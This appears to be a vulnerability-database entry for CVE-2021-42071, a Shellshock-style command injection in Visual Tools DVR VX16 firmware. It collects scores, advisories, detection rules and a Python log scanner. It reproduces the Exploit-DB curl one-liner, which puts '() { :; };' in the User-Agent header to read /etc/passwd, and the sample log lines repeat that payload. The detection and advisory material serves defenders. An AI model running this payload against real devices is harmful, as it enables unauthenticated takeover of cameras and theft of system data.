CVE-2021-42071
Published 2021-10-07
Priority P188 · critical · 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 69.88% (99.3th percentile)
In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| visual-tools | dvr_vx16_firmware | — | — |
Detection & IOCs
sigma
GET /cgi-bin/slogin/login.py HTTP/1.1 with User-Agent matching Shellshock pattern: () { :; };
yara
```yara
rule CVE_2021_42071_Shellshock_DVR {
    strings:
        $ua = "() { :; };"
        $path = "/cgi-bin/slogin/login.py"
    condition:
        $ua and $path
}
```
- Detect unauthenticated HTTP GET requests to /cgi-bin/slogin/login.py where the User-Agent header contains Shellshock-style metacharacters: '() { :; };'
- Alert on HTTP responses returning HTTP 200 with body matching 'root:.*:0:0:' following a request to /cgi-bin/slogin/login.py — this indicates successful /etc/passwd exfiltration via command injection.
- The exploit leverages the Shellshock (CVE-2014-6271) bash function definition syntax in the User-Agent header to inject OS commands; monitor for '() {' patterns in User-Agent fields on DVR endpoints.
- No authentication is required; any request to the login.py CGI endpoint with a malicious User-Agent is sufficient for exploitation. Flag all unauthenticated requests to this path with non-standard User-Agent values.
- Vulnerability is specific to Visual Tools DVR VX16 firmware version 4.2.28.0 running on Embedded Linux 2.6.35.4; detections should be scoped to this platform/version.
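The checks in the list above, sketched over web access logs as an added example (not taken from the indexed sources). It assumes a proxy in front of the DVR writes Combined Log Format; the sample lines, IP addresses and function names are constructed for illustration.

```python
import re

TARGET_PATH = "/cgi-bin/slogin/login.py"
# Combined Log Format (assumed): ip - user [time] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Bash function-definition prefix used by Shellshock, tolerant of spacing differences.
FUNC_DEF_RE = re.compile(r'\(\s*\)\s*\{')
# Root entry of /etc/passwd; a narrowed form of the 'root:.*:0:0:' body check above.
PASSWD_RE = re.compile(r'^root:[^:\n]*:0:0:', re.MULTILINE)


def classify(line):
    """Return (severity, ip, path) for a suspicious log line, or None."""
    m = LOG_RE.match(line.strip())
    if m is None or not FUNC_DEF_RE.search(m["ua"]):
        return None
    path = m["path"].split("?", 1)[0]
    # The pattern on the vulnerable CGI endpoint is the CVE-2021-42071 signature;
    # the same pattern on any other path is still worth recording at lower severity.
    severity = "high" if path == TARGET_PATH else "medium"
    return (severity, m["ip"], path)


def response_leaks_passwd(body):
    """True when a captured response body contains a root passwd entry."""
    return bool(PASSWD_RE.search(body))


def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit is not None]


# Constructed sample log lines (documentation-range IPs), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Jul/2021:10:00:01 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [05/Jul/2021:10:00:02 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 200 734 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"',
    '203.0.113.9 - - [05/Jul/2021:10:00:03 +0000] "GET /index.html HTTP/1.1" 404 0 "-" "(){ :;}; echo"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The response-body check needs a capture point that records bodies (proxy or IDS), since access logs do not contain them.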
CVSS provenance
nvd · v3.1 · 9.8 · CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 10.0 · CRITICAL · AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck · 9.8 · CRITICAL
GHSA
GHSA-5pjx-33j8-9h49: In Visual Tools DVR VX16 4
ghsa_unreviewed·2022-05-24
CVE-2021-42071 [CRITICAL] CWE-78 GHSA-5pjx-33j8-9h49: In Visual Tools DVR VX16 4
In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header.
VulnCheck
visual-tools dvr_vx16_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-42071 [CRITICAL] visual-tools dvr_vx16_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header.
Affected: visual-tools dvr_vx16_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.barracuda.com/2024/03/06/threat-spotlight-shellshock-bugs-miners
No detection rules found.
Exploit-DB
Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
exploitdb·2021-07-06·CVSS 9.8
CVE-2021-42071 [CRITICAL] Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
---
# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.
# CVE: CVE-2021-42071
# Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/
# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py
Nuclei
Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
nuclei·CVSS 9.8
CVE-2021-42071 [CRITICAL] Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
Template:
```yaml
id: CVE-2021-42071

info:
  name: Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
  author: gy741
  severity: critical
  description: Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
  remediation: |
    Apply the latest security patch or update provided by the vendor
```
No writeups or analysis indexed.